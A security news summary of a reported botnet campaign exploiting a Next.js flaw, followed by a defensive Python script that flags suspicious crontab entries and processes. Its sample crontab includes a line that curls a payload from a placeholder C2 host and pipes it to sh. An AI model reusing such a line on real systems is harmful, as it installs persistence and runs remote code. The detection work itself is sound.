Security researchers disclosed a nine-month campaign that enrolled Internet of Things devices and web applications into the RondoDox botnet, active through December 2025 and leaving about 90,300 hosts still susceptible worldwide.
KEY FACTS
- Campaign: Nine-month operation targeting IoT devices and web applications
- Initial access: Exploitation of React2Shell, CVE-2025-55182
- Vulnerable hosts: Roughly 90,300 susceptible instances as of December 31, 2025
- Payloads: Cryptocurrency miners, a bot loader and a Mirai variant
- Recommended fixes: Update Next.js, segment IoT, deploy WAFs
A technical analysis by CloudSEK said the campaign used the React2Shell flaw as an initial access vector to deploy the RondoDox loader and related tools.
The activity moved through three phases during 2025. Initial reconnaissance and manual scans occurred in March and April. Daily mass probing of web applications and some IoT models followed in April through June. From July into early December, the campaign shifted to hourly automated deployments.
Artifacts in the report include attempts to drop cryptocurrency miners under the path “/nuts/poop”, a botnet loader and health checker at “/nuts/bolts”, and a Mirai variant at “/nuts/x86”. The “/nuts/bolts” component terminates competing malware and miners, then fetches the main bot binary and establishes persistence by writing to /etc/crontab. The tool also scans /proc and kills non-whitelisted processes about every 45 seconds.
The campaign has expanded its toolkit by adding several N-day flaws. Mitigations recommended in the report include updating Next.js to a patched release, segmenting IoT devices onto dedicated VLANs, deploying web application firewalls, monitoring for unusual process execution, and blocking identified command and control infrastructure.
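The persistence and process-killing behaviour described above, together with the recommended monitoring for unusual process execution, can be turned into a simple host check. The following is an added example, not code from the report or from CloudSEK: it parses /etc/crontab-style text and a list of process command lines for the three indicator paths the report names. The scratch-directory heuristic, the sample crontab and process table, and the C2 hostname are all constructed placeholders.

```python
import re

# Indicator paths quoted in the report; everything else in this file is an assumption.
INDICATOR_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")
# Hypothetical extra heuristic: commands launched from world-writable scratch directories.
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# /etc/crontab lines: five schedule fields (or an @keyword), a user, then the command.
CRON_ENTRY = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def is_suspicious_command(cmd: str) -> bool:
    """True if the command references an indicator path or runs from scratch space."""
    return any(p in cmd for p in INDICATOR_PATHS) or any(d in cmd for d in SCRATCH_DIRS)

def suspicious_crontab_entries(crontab_text: str) -> list[dict]:
    """Parse system-crontab text and return entries whose command looks like the loader."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        # Skip blanks, comments and variable assignments such as SHELL=/bin/sh
        if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
            continue
        m = CRON_ENTRY.match(line)
        if m and is_suspicious_command(m.group("cmd")):
            findings.append({"line": lineno, "user": m.group("user"), "cmd": m.group("cmd")})
    return findings

def suspicious_processes(proc_table: list[tuple[int, str]]) -> list[int]:
    """Given (pid, cmdline) pairs as read from /proc/<pid>/cmdline, return pids to triage."""
    return [pid for pid, cmdline in proc_table if is_suspicious_command(cmdline)]

# Constructed sample data (not from the report); the C2 host is a placeholder.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.x/nuts/bolts
*/5 * * * * root sh -c 'curl -s http://c2-placeholder.example/nuts/x86 | sh'
"""
SAMPLE_PROCS = [(1, "/sbin/init"), (812, "/usr/sbin/sshd -D"),
                (4471, "/dev/shm/x86 -c 1"), (4490, "/tmp/nuts/bolts")]

if __name__ == "__main__":
    for f in suspicious_crontab_entries(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']} ({f['user']}): {f['cmd']}")
    print("pids to triage:", suspicious_processes(SAMPLE_PROCS))
```

On a live host, feed the function the contents of /etc/crontab and the /proc/<pid>/cmdline entries instead of the sample data; a match is a triage lead, not proof of compromise.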
WHY IT MATTERS
The campaign shows how high-severity web framework flaws can be weaponized to build large botnets that affect both servers and edge devices. Applying patches and isolating IoT assets reduce the chances of widespread compromise.

